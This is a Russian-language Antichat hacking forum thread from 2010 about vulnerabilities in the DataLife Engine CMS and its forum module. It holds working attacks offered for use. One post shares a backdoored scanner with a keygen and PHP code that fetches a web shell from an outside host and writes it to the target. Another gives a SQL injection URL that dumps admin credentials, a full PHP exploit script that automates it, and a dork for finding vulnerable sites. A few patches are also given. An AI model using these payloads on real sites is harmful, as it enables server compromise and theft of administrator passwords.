Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.03.2010, 15:32
|
|
Познающий
Регистрация: 07.06.2008
Сообщений: 32
Провел на форуме:
233970
Репутация:
7
|
|
Сообщение от zebrum
Раскрытие путей dle 8.3 engine/images.php
dle_skin: ../
Код:
if ($_COOKIE['dle_skin']) {
if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) {
$config['skin'] = $_COOKIE['dle_skin'];
}
}
Открываем site.ru/engine/images.php?area=short_story&add_id=
грузим картинку и получаем раскрытые пути) нужно какую то особую картинку грузить?
|
|
|
14.03.2010, 20:30
|
|
Новичок
Регистрация: 14.03.2010
Сообщений: 1
Провел на форуме:
15489
Репутация:
0
|
|
Сообщение от adzona
нужно какую то особую картинку грузить?
Нет, у меня с обычной получилось
|
|
|
|
14.03.2010, 21:00
|
|
Познающий
Регистрация: 07.06.2008
Сообщений: 32
Провел на форуме:
233970
Репутация:
7
|
|
Сообщение от Screami
Нет, у меня с обычной получилось
а тогда как получить раскрытие путей?
|
|
|
|
15.03.2010, 22:50
|
|
Banned
Регистрация: 04.09.2009
Сообщений: 67
Провел на форуме:
178600
Репутация:
22
|
|
Вот софтина сканнер dle сайтов с встроенным бекдором сборки от злого
Нужна база сайтов которых в паблике навалом..
Скачать
В архиве сканнер и кейген для него
Покупал за 15$ , потому выкласть не жалко...
На базе 16000 сайтов нашёл 6 бекдоров
Версия DLE 8.2-8.5
Сканнер можна настроить под любую ссылку бекдора если надо..
Скорость: 2-3 сайта в сек. (1мбит)
Сам бекдор выполняет любой PHP код, потому залить шелл не составит труда
Берём хостинг. Туда текстовик с шеллом вида shell.txt
Идём в бекдор. Пишем
$shell = file_get_contents("http://site/shell.txt");
$fp = fopen("shell.php", a);
fwrite($fp, $shell);
fclose($fp);
Последний раз редактировалось Dr.Brain; 15.03.2010 в 22:54..
|
|
|
|
16.03.2010, 17:56
|
|
Познающий
Регистрация: 28.08.2009
Сообщений: 53
Провел на форуме:
421751
Репутация:
15
|
|
Проблема: Недостаточная фильтрация входящих данных в регистрации.
Ошибка в версии: все версии
Степень опасности: Низкая
Баг нашёл: Lion__
Баг позволяет узнать префикс к бд.
Как юзать:
1) Переходим по ссылке ?do=register
2) Вводим логин, пароль, капчу, email более 50 символов.
Пример email:
qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft g@qawsedrftg.qawsedrftg
3) Нажимаем зарегистрироваться
4) Повторяем операцию с 1 по 3 шаги.
5) Получаем ошибку о дубликате поля. В ней смотрим префикс к бд.
Как это работает? Дело в том что поле email стоит ограничение в 50 символов, таким образом остальное всё обрезается, при первой регистрации в бд попало значение:
qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft
После второй регистрации идёт поиск поля email со значением:
qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft g@qawsedrftg.qawsedrftg
Которого нет, отправляется запрос, получаем ошибку.
Исправить:
Найти в engine/modules/register.php:
$email = $db->safesql( $parse->process( $_POST['email'] ) );
Заменить на:
$email = $db->safesql( $parse->process( substr($_POST['email'], 0,50) ) );
Источник: _http://forum.seo-king.ru/index.php?showtopic=377
должно получиться это:
 |
|
|
|
18.03.2010, 16:18
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 10
Провел на форуме:
118243
Репутация:
-1
|
|
Как просмотреть, что под хайдом в DLE?
|
|
|
|
18.03.2010, 19:51
|
|
Познающий
Регистрация: 29.05.2009
Сообщений: 55
Провел на форуме:
807573
Репутация:
7
|
|
dle forum 2.4 sql inj
Sql-inj в dle-forum*е 2.4 была найдена мной , ещё месяца 2 назат) решил выложить , т.к. сайтов ещё много дырявых.
site.ru/?do=forum&showtopic=23%2527+union+select+1,2,CONCA T_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+from+dle_users+where+ user_group=1+limit+1--
юзаем так ...
Защищаемся:
открываем файл: engine/forum/sources/components/init.php
446 строка
PHP код:
....
if ($_REQUEST['category'])
{
$act = 'category';
$cid =$_REQUEST['category'];
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';
$fid = $_REQUEST['showforum'];
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = $_REQUEST['showtopic'];
$t_act = '?t'.$tid;
}
......
заменяем на
PHP код:
......
if ($_REQUEST['category'])
{
$act = 'category';
$cid = intval($_REQUEST['category']);
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';
$fid = intval($_REQUEST['showforum']);
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = intval($_REQUEST['showtopic']);
$t_act = '?t'.$tid;
}
.....
вот типа сплоит писал месяца 2 назат для себя.
PHP код:
<form method="POST" >
Введи сайт "например" "<b>alldle.ru</b>" <input type="text" name="site" value="<?=$_POST['site']?>">
лимит вводить если показало mysql error<input type="text" name="lim" value="<?=$_POST['lim']?>">
<input type="submit" value="send">
</form>
<?php
if (!empty($_POST['site'])){
$lim="1";
if (!empty($_POST['lim'])){$lim ="{$_POST['lim']},";$lim .=$_POST['lim'];}
$url='http://'.$_POST['site'].'/?do=forum&showtopic=23%2527+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+'.$lim.'--';
$ua='Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10';
$cu=curl_init($url);
curl_setopt($cu,CURLOPT_HEADER, 0);
curl_setopt($cu,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cu,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($cu,CURLOPT_USERAGENT, $ua);
$log=curl_exec($cu);
$log=html_entity_decode($log);
if (preg_match_all('#<title>(.*)» (.*)</title>#i',$log,$log2)){
$ss=$log2[2][0];
if (!preg_match('#[:]#is',$ss,$loggg)){ echo 'нету баги ';exit;}
$save=explode(':',$ss);
echo " <b>site:</b> <font color='green'> ".$_POST['site']."</font><br>";
echo " <b>name:</b> <font color='red'> ".$save[0]."</font><br>";
echo "<b>pass:</b> <font color='blue'> ".$save[1]."</font><br>";
}
else { echo " баги не найдено =( ";preg_match_all('#<title>(.*)</title>#i',$log,$logi); echo "<b>{$logi[1][0]}</b>";}
curl_close($cu);
}
?>
(c) dark_cracker
dork:
inurl:/forum/ intext LE Forum v.2.4 © 2010 Pocketx.Ru
|
|
|
|
20.03.2010, 22:31
|
|
Новичок
Регистрация: 01.10.2009
Сообщений: 27
Провел на форуме:
52963
Репутация:
-2
|
|
Сообщение от botanig
Как просмотреть, что под хайдом в DLE?
Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
|
|
|
|
27.03.2010, 01:34
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
В 8.3, может и раньшых!
вывод какие модули стоят.
Файл
http://localhost/engine/ajax/antivirus.php
Вывод список!
Защищаемся
На начало добавить
PHP код:
if(!defined('DATALIFEENGINE'))
{
die("You lol! Anatole yzhe tut");
}
Последний раз редактировалось sir95; 27.03.2010 в 01:37..
|
|
|
|
09.04.2010, 12:00
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
